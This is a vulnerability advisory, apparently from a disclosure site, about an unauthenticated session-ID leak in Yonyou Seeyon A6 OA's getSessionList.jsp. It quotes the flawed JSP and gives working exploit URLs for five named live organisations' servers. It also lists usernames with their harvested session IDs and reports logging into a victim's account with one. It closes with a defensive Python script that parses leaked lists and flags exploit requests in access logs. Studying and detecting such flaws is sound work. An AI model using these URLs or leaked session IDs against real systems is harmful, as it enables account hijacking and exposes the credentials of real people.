### Summary: Yonyou Seeyon (用友致远) A6 Collaborative Management high-severity vulnerability #2

### Details:

The vulnerability discloses the SessionID of every currently logged-in user. With a leaked SessionID an attacker can log in as that user, administrators included; once inside, getting a shell is trivial.

Partial source of /yyoa/ext/https/getSessionList.jsp:

```
<%@ page contentType="text/html;charset=GBK"%>
<%@ page session="false" %>
<%@ page import="net.btdz.oa.ext.https.*"%>
<%
String reqType = request.getParameter("cmd");
String outXML = "";
boolean allowHttps = true;
if("allowHttps".equalsIgnoreCase(reqType)){
    //add code to judge whether it allow https or not
    allowHttps = FetchSessionList.checkHttps();
    if (allowHttps)
        response.setHeader("AllowHttps","1");
}
// No authentication or authorization check precedes either of the branches below.
if("getAll".equalsIgnoreCase(reqType)){
    // Returns the session list of every logged-in user to any caller.
    outXML = FetchSessionList.getXMLAll();
}
else if("getSingle".equalsIgnoreCase(reqType)){
    // Looks up a single session by a caller-supplied session ID.
    String sessionId = request.getParameter("ssid");
    if(sessionId != null){
        outXML = FetchSessionList.getXMLBySessionId(sessionId);
    }
}
else{
    outXML += "<?xml version=\"1.0\" encoding=\"GB2312\"?>\r\n";
    outXML += "<SessionList>\r\n";
    //outXML += "<Session>\r\n";
    //outXML += "</Session>\r\n";
    outXML += "</SessionList>\r\n";
}
out.println(outXML);
%>
```

As the code above shows, when the `cmd` parameter is `getAll` the page returns the SessionIDs of all logged-in users. The JSP is declared `session="false"` and performs no authentication or authorization check of its own, so the request needs no login; the `getSingle` branch additionally looks up whatever session ID the caller supplies in `ssid`. Because the response is served as `text/html`, a browser renders the XML as a plain list of username / session-ID pairs.

For example:

http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll

```
weiph 9EA4F8832FA1C9BA99E3D13E2F01CAF7
zhaozy F9244E7F1B8C39BB8919FAE8E19ED16A
```

http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll

```
huangsc 0088D0C9F166AD9E5C4907908B97CF2B
jiangyl 1057A63B52E4D78CA92B989149D1AC37
lisy 1586E35E947B4EF4C92AD27B8D1C279B
zhongjh 1AE537BD94C0286CE5FFE0509B4AB6D0
//...
```

http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll

```
yanyongrong 372BE72272E0C6ABB3A5815AACAD5AB8
wujianbo 5D33C475E451E080C074DD741F46470B
wangluolijin 64CCB1F31B206ADA1716A8A0252137EA
tianqinghua 78C93A5F4CEA64E34B654E8FEE470A1E
lidalong 84037EF6F41432DE9EE907C94F7B091B
liujianjun 98745C840A8BE288D91C50BB8D1F6A54
```

Cases:

http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://60.31.196.2/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://110.167.194.10:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll

### Proof of vulnerability:

Using a harvested session ID, the user's session was taken over and the login succeeded.

![aa.jpg](https://images.seebug.org/upload/201503/19214803b49fdccdc00a3c283748211aa9176ea4.jpg)
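For defenders, the two things worth automating from this advisory are recognising the disclosed list (to know which accounts must be logged out and have their sessions invalidated) and spotting requests that reached the leaking `cmd` branches in the web server's access log. The following Python is an added example for this page, not code from the advisory or from Yonyou. It assumes the `cmd=getAll` output takes the `<username> <session id>` per-line form the listings above show and that the IDs are 32 hex characters, as every ID in those listings is; the access-log lines are constructed in Apache/Tomcat common format and are not real traffic. Matching on `cmd` is case-insensitive because the JSP dispatches with `equalsIgnoreCase`.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample modelled on the output the advisory shows for cmd=getAll:
# one "<username> <session id>" pair per line. The first two lines reuse values
# from the advisory's own listing; the last two are deliberately malformed.
SAMPLE_RESPONSE = """\
weiph 9EA4F8832FA1C9BA99E3D13E2F01CAF7
zhaozy F9244E7F1B8C39BB8919FAE8E19ED16A
garbage line without an id
admin NOT-A-SESSION-ID
"""

# Assumption: leaked IDs are 32 hex characters, as in every listing above.
SESSION_ID_RE = re.compile(r"^[0-9A-Fa-f]{32}$")


def parse_session_list(text: str) -> Dict[str, str]:
    """Map username -> session ID for every well-formed line of a cmd=getAll response."""
    sessions: Dict[str, str] = {}
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) != 2:
            continue
        user, sid = parts
        if SESSION_ID_RE.match(sid):
            sessions[user] = sid.upper()
    return sessions


# Constructed access-log lines (Apache/Tomcat common format, not real traffic):
# two hit the leaking cmd values, one hits the harmless allowHttps branch,
# one is ordinary portal traffic.
SAMPLE_ACCESS_LOG: List[str] = [
    '203.0.113.7 - - [19/Mar/2015:21:40:01 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 200 1843',
    '203.0.113.7 - - [19/Mar/2015:21:40:09 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getSingle&ssid=9EA4F8832FA1C9BA99E3D13E2F01CAF7 HTTP/1.1" 200 210',
    '198.51.100.2 - - [19/Mar/2015:21:41:00 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=allowHttps HTTP/1.1" 200 96',
    '198.51.100.2 - - [19/Mar/2015:21:41:30 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 5120',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Compared case-insensitively so a mixed-case path on a case-insensitive host still matches.
LEAK_PATH = "/yyoa/ext/https/getsessionlist.jsp"
# The JSP dispatches with equalsIgnoreCase, so the cmd value is matched case-insensitively too.
LEAKING_CMDS = {"getall", "getsingle"}


def find_session_list_abuse(lines: List[str]) -> List[dict]:
    """Return one record per request that reached a session-disclosing branch of getSessionList.jsp."""
    hits: List[dict] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path.lower() != LEAK_PATH:
            continue
        qs = parse_qs(url.query)
        cmd = qs.get("cmd", [""])[0].lower()
        if cmd not in LEAKING_CMDS:
            continue
        ssid: Optional[str] = qs.get("ssid", [None])[0]
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "cmd": cmd,
            "ssid": ssid,
            # A 200 means the list (or the single session) was actually handed out.
            "served": m.group("status") == "200",
        })
    return hits


if __name__ == "__main__":
    for user, sid in parse_session_list(SAMPLE_RESPONSE).items():
        print(f"exposed session: {user} {sid}")
    for hit in find_session_list_abuse(SAMPLE_ACCESS_LOG):
        print(f"{hit['ts']} {hit['ip']} cmd={hit['cmd']} ssid={hit['ssid']} served={hit['served']}")
```

Every account returned by `parse_session_list` should be treated as compromised until its server-side session is invalidated, since the ID alone is the credential here. The `allowHttps` branch is deliberately not flagged: it returns only a header, so a hit there is reconnaissance at most, while a served `getAll` or `getSingle` is a confirmed disclosure.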